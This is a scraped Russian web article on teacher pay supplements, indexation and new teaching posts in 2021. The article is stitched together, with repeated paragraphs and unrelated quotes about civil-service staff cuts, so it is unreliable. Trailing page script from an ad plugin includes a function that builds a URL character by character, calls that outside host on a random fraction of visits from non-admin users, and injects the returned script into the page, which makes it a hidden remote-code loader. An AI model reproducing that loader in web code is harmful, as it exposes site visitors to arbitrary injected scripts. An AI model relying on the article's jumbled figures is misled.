Какие надбавки будут учителям в 2021

Зарплата педагога состоит из базовой, компенсирующей и стимулирующей частей. Базовая часть должна составлять не меньше 70 процентов от зарплаты. Компенсирующая часть — это надбавки за вредные условия труда, доплата за классное руководство. Стимулирующая часть — это доплаты за успешные результаты, которых достигает педагог. Компенсационную и стимулирующую части в разных регионах платят по-разному — критерии для доплаты устанавливаются на местах.

Как сейчас обстоят дела с зарплатой педагогов

17 декабря 2020 года президента РФ Владимира Путина на ежегодной пресс-конференции спросили о зарплатах педагога. Он ответил, что зарплата учителя, конечно, должна быть выше зарплаты уборщицы. Сразу после этого СМИ стали писать о возможных изменениях зарплаты педагогов в 2021 году, о готовящихся законах. К сожалению, это не всегда соответствовало фактам. Разбираемся, что точно случится с зарплатой в 2021, а чего ждать не стоит.

В 2021 году зарплату будут платить по единым требованиям

Эти требования должны касаться педагогов со всей страны. Но, конечно, это не значит, что педагоги по всей России будут получать одинаковую зарплату. Уровень жизни в разных регионах отличается от других, поэтому зарплата педагога будет привязана к региональным показателям.

  1. надбавки и доплаты (за сверхурочную работу, интенсивность);
  2. премиии стимулирующие выплаты – начисляются в индивидуальном порядке за заслуги;
  3. выплаты за выслугу лет (составляю от 10% за 5-летний стаж до 30% – за 15-летний)

Согласно исследованиям, сфера образования является одной из самых низкооплачиваемых . В законопроекте от 2012 года указано, что к 2021 году зарплата учителей должна увеличиться на 200%. По факту, этим цифрам сегодня уже никто не верит, так как предыдущие годы не показали активного увеличение оплаты труда.

С 2021 года учителям будут платить по-новому (последние новости)

Всему виной кризис, охвативший страну и падение доходов населения. А требования, прописанные в указе президента, так и остаются невыполненными, в связи с чем, работников сферы образования интересует, будет ли существенное повышение заработной платы учителям в 2021 году.

В том случае, если в трудовое законодательство будут внесены изменения, то уровень заработной платы учителя должен будет стать существенно выше минимального размера оплаты труда, на котором он сейчас находится в более, чем 80% регионов – по данным Всероссийского профсоюза работников образования.

Так, в частности, предлагается ввести доплаты тем учителям, которые работают с детьми с особенностями развития. Речь идет о педагогах именно общеобразовательных школ, в обучении у которых находятся дети, относимые к нуждающимся в инклюзивном образовании, а не о педагогах, работающих в специальных образовательных учреждениях.

Прогнозируемые изменения по зарплате. Введение новых должностей

В 2021 году ожидается индексация заработной платы учителей. Провести ее планируется в апреле 2021 года, а размер индексационного коэффициента будет рассчитан на основании данных Росстата о размере инфляции, установившейся по итогам 2020 года.

На практике же изменения предполагают следующие моменты: если в Екатеринбурге или Самаре зарплата учителя достигала ранее 25 000 рублей, и ему можно было рассчитывать на получение ежемесячной доплаты не более двух-трех тысяч рублей, то с 2021 года суммарный доход педагога за месяц может увеличиться до уровня от 40 до 50 тысяч.

Еще почитать --->  Что даёт государство за 3-его ребенка в 2021 в саратовской области

9 ноября 2020 г. российские парламентарии приняли закон, регламентирующий новый порядок начисления зарплат сотрудникам бюджетной отрасли. Граждане России, представляющие сферу образования, разумеется, – в их числе.

Зарплаты учителям будут начислять по-новому в 2021 году

Правительство решило стимулировать педагогов, а потому властям субъектов предоставили право на обеспечение соответствующих доплат к окладам – их назвали компенсационными или стимулирующими. Непосредственно размер оклада российского педагога должен быть не ниже 70-ти процентов от величины выплачиваемых средств.

«Мы же с вами слышим, что есть идея реализовать «регуляторную гильотину». Она подразумевает сокращение контрольных функций, но помимо контрольных функций у госорганов еще есть разнообразные функции, от которых, на мой взгляд, нужно отказаться. Мы же понимаем, что отказ от функций вызывает реальное сокращение госаппарата. Соответственно, если человек не приносит пользу, то нужно от этой функции отказаться, а человека либо уволить, либо перепрофилировать», ­– заявил Баширов.

«Обычно это выглядит следующим образом: идет разнарядка на министерство, например сократить 10 % численности. Если вы не закладываете механизмы аудита, а здесь, очевидно, будет предложено просто сокращение на 10 %, то кого ты уволишь, неважно. Каждое министерство будет искать кого-то, кого, с его точки зрения, нужно уволить или можно уволить. Обычно это самые низкооплачиваемые сотрудники, самого низкого грейда», – пояснил Баширов.

Если анонсируемые Минфином масштабные сокращения все же состоятся, то, вероятно, основным критерием для них будет эффективность сотрудников. Об этом рассказал директор Института бизнеса и делового администрирования РАНХиГС Сергей Мясоедов.

  1. В 2021 году оклад учителям будет проиндексирован на 6,8%.
  2. Заработная плата работников сферы образования складывается из нескольких составляющих, согласно присвоенной категории, уровня квалификации и территориального расположения школы.
  3. С 2020 года введена новая схема начисления заработка и установлены звания для педагогов.
  4. В Москве и области определены районы с высоким уровнем заработной платы работников сферы образования.
  • учитель — начинающий педагог, ни разу не повышавший квалификацию и не получавший дополнительного образования;
  • старший учитель — преподаватель, который кроме обучения школьников занимается написанием методических программ для проведения занятий и развития дисциплин, а также участвует в коррекционной работе;
  • ведущий учитель — координирует работу педагогического коллектива, занимается организацией процесса обучения.

Подводя итогов

Показатели минимального размера оплаты труда устанавливаются на федеральном уровне, но регионы вправе изменить МРОТ в соответствии с уровнем жизни в конкретном субъекте Федерации, но только в сторону повышения. Исправить положение планируется за счет реализации национального проекта «Образование».

В том случае, если в трудовое законодательство будут внесены изменения, то уровень заработной платы учителя должен будет стать существенно выше минимального размера оплаты труда, на котором он сейчас находится в более, чем 80% регионов – по данным Всероссийского профсоюза работников образования.

Так, в частности, предлагается ввести доплаты тем учителям, которые работают с детьми с особенностями развития. Речь идет о педагогах именно общеобразовательных школ, в обучении у которых находятся дети, относимые к нуждающимся в инклюзивном образовании, а не о педагогах, работающих в специальных образовательных учреждениях.

💰 Прогнозируемые изменения по зарплате. Введение новых должностей

  • оклад. Он зависит от количества учебных часов, которые педагог отработал за одну неделю. По всей Российской Федерации сегодня базовая ставка по своему предмету составляет не менее 18 часов. Если эта ставка ниже, то педагог должен «дотянуть» до ставки путем дополнительных занятий, в том числе с детьми, нуждающимися в особых условиях обучения, например, в надомном обучении;
  • надбавка за стаж и выслугу лет;
  • надбавка за методическую работу в образовательном учреждении;
  • доплаты за ведение внеурочных систем обучения (кружки, факультативные занятия);
  • региональные надбавки (например, северные или за особые условия труда – в северных и приравненных к ним регионах).

По поручению председателя правительства РФ Михаила Мишустина мы разрабатываем предложения по установлению единых требований к оплате труда учителей. Посмотрим и базовую ставку, и надбавки, которые есть в системе образования Этот вопрос для нас будет одним из приоритетов следующего года. Цель нашей работы – каждый педагог должен знать не только уровень своего дохода, но и из чего он состоит, какие у него надбавки, и все это, повторюсь, должно быть максимально прозрачно

В школах есть крупные доплаты. Например, классные руководители с 1 сентября получают дополнительные 5 тыс. рублей. Такое поручение дал президент, напомнил Кравцов. Но это не единственная должность с хорошими надбавками. С 1 марта в 10 пилотных регионах появится новая – советник директора по воспитательной работе. Педагог будет получать дополнительные 15 тыс. рублей.

Еще почитать --->  Статус ветерана труда в кемеровской области

Научат и воспитают

Зарплаты учителей – больной вопрос, который граждане задают власти при любой возможности. О равенстве зарплаты учителя и уборщицы спросили даже Владимира Путина на пресс-конференции. Выяснилось, что это не учитель получает мало, а уборщица – много, ведь зарплата не должна быть ниже МРОТ. Надбавки повышают выплаты учителям до средних зарплат, но педагогам не всегда понятна прозрачность доплат. А власти нужно не только зарплаты повышать, но и выполнять поправки в закон об образовании. Поэтому с марта в школах появится новая должность с надбавкой 15 тыс. рублей.

В рамках проекта «Земский учитель» предоставляется единовременная компенсационная выплата учителям, переехавшим на работу в сельские населенные пункты, рабочие поселки, поселки городского типа или города с населением до 50 тыс. человек.

То, что педагогическим работникам предоставляется удлиненный оплачиваемый отпуск, продолжительность которого устанавливается Правительством РФ, прописано в ст. 334 ТК РФ. Конкретная продолжительность отпуска по категориям установлена постановлением Правительства РФ.

Отпуск у учителей варьируется от 42 до 56 календарных дней в год без учета дополнительных дней отпуска, которые могут или должны предоставляться по иным основаниям. Так, для учителей, работающих на Крайнем Севере, отпуск увеличен до 80 дней. Кроме того, педагог может получить годовой отпуск за свой счет с сохранением за ним его должности.

Последние новости говорят, что на повышение зарплаты учителя могут рассчитывать только за счет ежегодной индексации, отражающей темпы инфляции в России за предыдущий год. Специалистам с невысоким заработком также не следует также забывать про его привязку к МРОТ, для которого на 2021 год будет установлено новое значение.

Проблемы оплаты труда

Значительное увеличение зарплат учителей было анонсировано в так называемых майских указах президента РФ, принятых в далеком 2012 году. Исходя из их содержания зарплата педагогических работников должна быть в 2021 году не ниже средней по региону. Мало того, что это условие до сих пор не всегда выполняется, все во многом зависит от экономического благополучия субъекта РФ, поскольку образование финансируется за счет регионального, а не федерального бюджета. Соответственно, кто может, доплачивает педагогам больше. Кроме того, на окончательную сумму влияют региональные (в т. ч. «северные») коэффициенты.

Индексация учительских зарплат

Сфера образования, особенно в некоторых регионах, все еще остается одной из самых низкооплачиваемых на российском рынке труда. Несмотря на нормативные акты, декларирующие повышение зарплаты учителей, на практике все зачастую остается без кардинальных улучшений и 2021 год, похоже, не станет исключением.

9 ноября 2020 г. российские парламентарии приняли закон, регламентирующий новый порядок начисления зарплат сотрудникам бюджетной отрасли. Граждане России, представляющие сферу образования, разумеется, – в их числе.

Зарплаты учителям будут начислять по-новому в 2021 году

Благодаря новому механизму парламентарии надеются выйти на заметное сокращение того колоссального разрыва, который наблюдается в настоящее время в доходах столичных и петербуржских учителей, и педагогов, работающих в других субъектах нашей страны.

Какие аргументы приводят депутаты Госдумы России?

Правительство решило стимулировать педагогов, а потому властям субъектов предоставили право на обеспечение соответствующих доплат к окладам – их назвали компенсационными или стимулирующими. Непосредственно размер оклада российского педагога должен быть не ниже 70-ти процентов от величины выплачиваемых средств.

Еще почитать --->  Статья 228 ч5

Ключевыми задачами для Министерства просвещения в следующем году станут сохранение и повышение качества образования, в том числе в рамках проекта «500+», сокращение бюрократической нагрузки на учителей, их всесторонняя поддержка, гармонизация системы оплаты педагогического труда. Об этом рассказал Министр просвещения Российской Федерации Сергей Кравцов на завершающем 2020 год совещании в режиме ВКС с органами исполнительной власти субъектов Российской Федерации, осуществляющими государственное управление в сфере образования.

Выступление первого заместителя Министра просвещения Российской Федерации Дмитрия Глушко было посвящено реализации в 2020 году мероприятий, направленных на развитие системы среднего профессионального образования и повышение качества подготовки кадров.

Напомним, что Министерством планируется введение новых квалификационных категорий – «учитель-методист» и «учитель-наставник». По словам замминистра просвещения, это будет способствовать самореализации учителей, развитию системы наставничества в стране.

«Я не могу это комментировать, потому что мы являемся очевидцами тридцатого или сорокового заявления Минфина на эту тему. Я бы не сказал, что мы по итогам этих заявлений видим какие-то реалистичные перемены. Невозможно комментировать год от года одних и тех же людей, одни и те же слова», – заявил в беседе с обозревателем «ФедералПресс» Шеин.

Если анонсируемые Минфином масштабные сокращения все же состоятся, то, вероятно, основным критерием для них будет эффективность сотрудников. Об этом рассказал директор Института бизнеса и делового администрирования РАНХиГС Сергей Мясоедов.

«Обычно это выглядит следующим образом: идет разнарядка на министерство, например сократить 10 % численности. Если вы не закладываете механизмы аудита, а здесь, очевидно, будет предложено просто сокращение на 10 %, то кого ты уволишь, неважно. Каждое министерство будет искать кого-то, кого, с его точки зрения, нужно уволить или можно уволить. Обычно это самые низкооплачиваемые сотрудники, самого низкого грейда», – пояснил Баширов.

Средняя зарплата российских учителей по итогам второго квартала 2020 года составила менее 31 тыс. рублей. Об этом в понедельник сообщает газета «Известия» со ссылкой на данные аналитического центра «Авито работа».

Минпросвещения, Минтруд, Минфин и Минэкономразвития до 1 марта должны разработать предложения по совершенствованию системы оплаты труда педагогов с учетом установления минимальной зарплаты не ниже прожиточного минимума. Соответствующее поручение дал российский премьер Михаил Мишустин, сообщает Ura.ru.

Мишустин требует изменить зарплаты учителей

Стимулирующая часть. Критерии для этой надбавки составляет управляющий совет школы. Обычно это высокие результаты учеников на экзаменах и олимпиадах, использование новых технологий, стаж и повышение квалификации.

Эти нюансы отложены на время обсуждения второго чтения пакета поправок к Трудовому кодексу. Однако из информированных источников стало известно, что поправки намерены принять до старта подготовки бюджетов — государственного и региональных. Это рационально, поскольку позволит заложить в бюджет на наступающий год необходимые для выплат средства.

Информация к размышлению

Вторым аспектом, способным повысить оплату нелегкого учительского труда, аналитические агентства признают надбавку в 5 тысяч за классное руководство. По факту, это означает, что она должна быть начислена 838 тысячам учителей, осуществляющих классное руководство. Однако аналитики отмечают и неясные аспекты в этом решении:

Что уже предпринято для изменений в 2020/2021 учебном году

  1. Пакет поправок к Трудовому кодексу предусматривает возможность для правительства увеличить оплату труда в важных отраслях (в том числе, медицине и образовании).
  2. Реальное соотношение базового оклада и прибавляемых на индивидуальном уровне стимулирующих надбавок в некоторых регионах составляет 1:3. Причем 30 % — доля базовой части. Это означает, что средний размер учительской зарплаты по региону, в реальности может обернуться минималкой, меньше которой платить невозможно.
  3. Выпускники педагогических вузов в первые годы работы не всегда могут получать стимулирующие надбавки и работают за небольшую зарплату. Поэтому в Госдуме намерены разработать единый перечень таких выплат и требования к педагогам, претендующим на их получение.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};